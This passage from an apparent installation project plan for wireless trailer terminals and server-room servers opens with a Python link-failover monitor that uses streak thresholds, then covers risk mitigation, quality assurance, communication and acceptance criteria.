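FAIL_STREAK = 2          # breaching samples before a fault is declared
RECOVER_STREAK = 3       # clean samples before the link is trusted again


class LinkState:
    def __init__(self, name):
        self.name, self.healthy = name, True
        self.bad_streak = self.good_streak = 0
        self.events = []   # human-readable fault/recovery log

    def observe(self, latency_ms, loss):
        """Update health from one (latency_ms, loss) probe; return health."""
        if latency_ms > LATENCY_MS_MAX or loss > LOSS_MAX:
            self.bad_streak, self.good_streak = self.bad_streak + 1, 0
            if self.healthy and self.bad_streak >= FAIL_STREAK:
                self.healthy = False
                self.events.append(f"{self.name}: fault latency={latency_ms}ms loss={loss:.0%}")
        else:
            self.good_streak, self.bad_streak = self.good_streak + 1, 0
            if not self.healthy and self.good_streak >= RECOVER_STREAK:
                self.healthy = True
                self.events.append(f"{self.name}: recovered")
        return self.healthy


def select_active_link(samples):
    """Feed paired probes; return (active link per step, fault/recovery events)."""
    primary, backup = LinkState("primary"), LinkState("backup")
    active = []
    for (p_lat, p_loss), (b_lat, b_loss) in samples:
        p_ok, b_ok = primary.observe(p_lat, p_loss), backup.observe(b_lat, b_loss)
        # Prefer the primary; use the backup only while the primary is in
        # fault and the backup is sound (if both are down, nothing is better).
        active.append(backup.name if (not p_ok and b_ok) else primary.name)
    return active, primary.events + backup.events


# Constructed probe pairs (primary, backup): the primary degrades, then recovers.
SAMPLES = [
    ((40.0, 0.00), (60.0, 0.01)),
    ((200.0, 0.02), (60.0, 0.01)),  # first breach: no switch yet
    ((220.0, 0.12), (65.0, 0.01)),  # second breach: fault, switch to backup
    ((50.0, 0.00), (62.0, 0.00)),   # clean, but three are needed to recover
    ((45.0, 0.00), (61.0, 0.00)),
    ((42.0, 0.00), (63.0, 0.00)),   # third clean sample: back to primary
]
```

Running `select_active_link(SAMPLES)` shows the switch to the backup happening only at the second breaching probe and the return to the primary only after three clean ones, which is the behaviour a monitoring rule needs to avoid oscillating between links.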


By stocking spare parts and strengthening inspections, making detailed schedule plans and enhancing communication, and establishing a comprehensive network monitoring system, the project team is able to effectively reduce the impact of equipment failures, schedule delays and network failures on the project, ensuring that the installation of the VMT for the wireless trailer terminals and the servers in the server room proceeds smoothly and that the project is ultimately delivered successfully.


quality assurance (QA)


In the installation project of equipment such as wireless trailer terminal VMT and server room servers, the implementation of standardized operations is the basis for ensuring the success of the project. Project teams must strictly follow the installation manuals and operating instructions provided by the equipment manufacturers to ensure that each step meets the required standards. In this way, human error can be minimized and the accuracy and safety of the installation can be improved. In addition, standardized operations provide teams with consistent operating procedures, allowing new members to get up to speed quickly and reducing training costs.


Documentation management is equally critical. After the installation of the equipment is completed, the project team needs to record the configuration information of the equipment in detail, including the model number, serial number, installation location, network settings and so on. This information not only provides an important basis for later maintenance, but also helps to quickly locate the problem when the equipment fails. Documentation should be managed electronically for easy access and updating, while ensuring that all relevant personnel have easy access to the latest configuration information. In addition, regular review and updating of documents to ensure the accuracy and completeness of information is also part of document management.


In the system testing phase, comprehensive testing with professional testing tools is a key part to ensure stable system operation. The team should conduct system testing for different functional modules, including performance testing, stress testing and security testing. Through professional testing tools, the system's operation status can be accurately assessed, and potential problems can be found and solved in time. For example, the use of network monitoring tools can detect network latency, bandwidth occupation and other indicators in real time to ensure the stability of data transmission. Meanwhile, performance testing can help assess the performance of the system under high load conditions to ensure that it can withstand the expected pressure in actual operation. All test results should be recorded in detail and reviewed when necessary to ensure continuous improvement and optimization of the system.


Standardized operation, document management and test verification complement each other to ensure the smooth progress of the wireless trailer terminal VMT and server room server installation project. Through these measures, the project team can ensure the correct installation and configuration of the equipment, improve the efficiency of subsequent maintenance, secure the long-term stable operation of the system, and lay a solid foundation for the success of the project.


communication and coordination


Regular meetings: regular project meetings are held to report project progress and resolve problems.


Communication channels: open communication channels are established for timely feedback.


Project acceptance


In the wireless trailer terminal VMT and server room server installation project, the development of acceptance criteria and content is an important part of ensuring the quality of project delivery. First, acceptance criteria should be developed based on project requirements and design documents, with clear indicators and requirements. Project requirements usually cover specific customer expectations and usage scenarios, while design documents describe in detail the system architecture, functional modules and performance requirements. On this basis, the project team needs to develop a set of detailed acceptance criteria, including functional acceptance criteria, performance acceptance criteria and security acceptance criteria. These criteria not only provide a quantitative basis for project acceptance, but also ensure that all relevant parties have a common understanding of the project outcomes.


In terms of acceptance content, the first focus needs to be on checking that the equipment installation meets the requirements. This includes a review of the equipment's physical location, connections and safety specifications. The equipment should be installed at the specific location given in the design documents, and all connections must be secure and reliable. The connections of the power supply, network interface, signal receiver and other parts of the equipment also need to be checked in detail to ensure the stability and safety of the equipment in actual operation. If any non-compliance is found, it should be recorded and rectified in time to ensure that the final delivered equipment meets the design standards.


Secondly, the completeness of the system functionality is also an important element of acceptance. The project team needs to test all functional modules one by one to ensure that they operate normally and can meet the project requirements. This includes the basic functions of the wireless trailer terminal, the accuracy of data transmission, and the compatibility of the system interface. The team also needs to verify the effectiveness of the system's functions in actual operation, such as whether the user rights management, data processing flow and alarm mechanism work properly. Functional tests should cover all usage scenarios to ensure that the system can meet the actual needs of users.


Finally, the performance acceptance criteria should not be ignored. The project team should evaluate the performance of the system, including indicators such as response time, data processing capacity and the number of concurrent users. Through load testing and stress testing, a highly concurrent environment can be simulated to ensure that the system still runs stably under high load. For example, testing checks whether the system's response time at peak utilization meets the preset standards and whether the data transmission rate meets the requirements. In addition, the security performance of the system needs to be verified to ensure the security of data transmission and the system's ability to protect against potential threats.


Through rigorous audits of equipment installation, system functionality and performance, the project team was able to ensure that the final delivery of the system met the design requirements and customer expectations, laying a solid foundation for subsequent system operation and maintenance.